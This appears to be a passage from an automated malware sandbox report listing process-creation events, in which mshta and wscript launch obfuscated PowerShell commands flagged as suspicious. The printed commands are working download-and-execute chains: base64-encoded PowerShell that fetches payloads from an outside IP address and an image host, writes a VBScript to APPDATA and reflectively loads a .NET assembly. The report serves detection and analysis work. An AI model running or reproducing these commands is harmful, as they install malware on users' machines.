        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV